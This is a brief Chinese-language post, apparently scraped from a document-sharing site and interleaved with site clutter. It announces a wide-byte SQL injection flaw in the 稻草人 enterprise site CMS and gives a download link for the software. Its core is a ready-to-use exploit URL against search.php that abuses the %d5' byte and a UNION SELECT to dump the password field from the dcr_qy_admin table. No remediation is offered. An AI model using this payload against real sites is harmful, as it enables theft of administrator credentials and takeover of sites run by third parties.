稻草人企业站基于php+sqlite与php+mysql两个版本,php+sqlite特点和asp+access差不多,优点是利于备份,现在大多网站空间都支持php+sqlite,
稻草人企业站管理系统宽字节注入漏洞利用漏洞预警
。php+mysql特点是利于处理大量的数据,但备份和还原不方便。在站长下载站下了一套企业建站程序,发现人气还蛮高的,程序下载地址:
http://down.chinaz.com/soft/26802.htm 就去测试一下发现了一个宽字节注入漏洞,
电脑资料
《稻草人企业站管理系统宽字节注入漏洞利用漏洞预警》(https://www.unjs.com)。EXP:
http://www.xxxx.com/search.php?k=10%d5'%20union%20select%201,password,3%20from%20dcr_qy_admin%23
爆密码的效果如图: